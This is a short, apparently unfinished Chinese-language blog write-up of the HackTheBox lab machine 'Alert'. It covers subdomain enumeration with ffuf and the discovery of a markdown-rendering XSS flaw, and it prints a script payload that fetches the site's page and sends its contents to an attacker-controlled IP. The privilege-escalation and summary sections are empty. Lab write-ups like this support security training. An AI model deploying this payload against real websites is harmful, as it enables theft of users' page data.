Stack Ashes
Go back

Alert

靶场概述

难度: Easy 描述:

基本信息

🚀本地机器信息目标机器信息
IP10.10.16.4510.10.11.44
OSkali

信息搜集

端口扫描

通过子域枚举发现

ffuf -u http://alert.htb -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -H "Host: FUZZ.alert.htb" -fw 20
http://statistics.alert.htb/

攻击向量

只有80端口和22 以80端口的web服务为入口

看起来是个markdwon 解析

还有一个xss漏洞 还有一个子域的,但是需要账户和密码

漏洞利用

#xss

<script> fetch("http://alert.htb/") .then(response => response.text()) .then(data => { fetch("http://10.10.xx.xx/?data=" + encodeURIComponent(data)); }) .catch(error => console.error("Error fetching the messages:", error)); </script>

提权

知识点回顾

总结

Share this post on:
Share this post via WhatsApp Share this post on Facebook Share this post on X Share this post via Telegram Share this post on Pinterest Share this post via email
Previous Post
thm-otf
Next Post
thm-dailybugle